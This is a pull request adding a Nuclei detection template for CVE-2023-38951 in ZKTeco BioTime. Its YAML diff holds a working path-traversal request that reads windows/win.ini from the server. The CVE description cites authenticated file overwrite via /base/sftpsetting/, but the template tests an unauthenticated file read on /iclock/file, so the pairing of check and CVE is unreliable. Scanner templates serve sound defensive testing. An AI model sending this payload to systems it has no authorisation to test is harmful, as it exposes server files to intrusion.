### PR TITLE
Add CVE-2023-38951 (Updated CVEs)

### DIFF
--- a/http/cves/2023/CVE-2023-38951.yaml
+++ b/http/cves/2023/CVE-2023-38951.yaml
@@ -1,0 +1,38 @@
+id: CVE-2023-38951
+
+info:
+  name: ZKTeco BioTime 8.5.5 - Path Traversal 
+  author: riteshs4hu
+  severity: critical
+  description: |
+    ZKTeco BioTime 8.5.5 through 9.x before 9.0.1 (20240617.19506) allows authenticated attackers to create or overwrite arbitrary files on the server via crafted requests to /base/sftpsetting/ endpoints that abuse a path traversal issue in the Username field and a lack of input sanitization on the SSH Key field. Overwriting specific files may lead to arbitrary code execution as NT AUTHORITY\SYSTEM.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38951
+    - https://krashconsulting.com/fury-of-fingers-biotime-rce/
+    - https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-38951
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:::::::*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ZKTeco
+    product: BioTime
+  tags: cve,biotime,zkteco,file-read
+
+http:
+
+  - raw:
+      - |
+        GET /iclock/file?SN=win&url=/../../../../../../../../windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(base64_decode(body), '[fonts]')"
+          - "contains(base64_decode(body), 'MAPI=1')"
+        condition: and


### PR DESCRIPTION
### PR Information

Add CVE-2023-38951

ZKTeco BioTime 8.5.5 through 9.x before 9.0.1 (20240617.19506) allows authenticated attackers to create or overwrite arbitrary files on the server via crafted requests to /base/sftpsetting/ endpoints that abuse a path traversal issue in the Username field and a lack of input sanitization on the SSH Key field. Overwriting specific files may lead to arbitrary code execution as NT AUTHORITY\SYSTEM.


### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
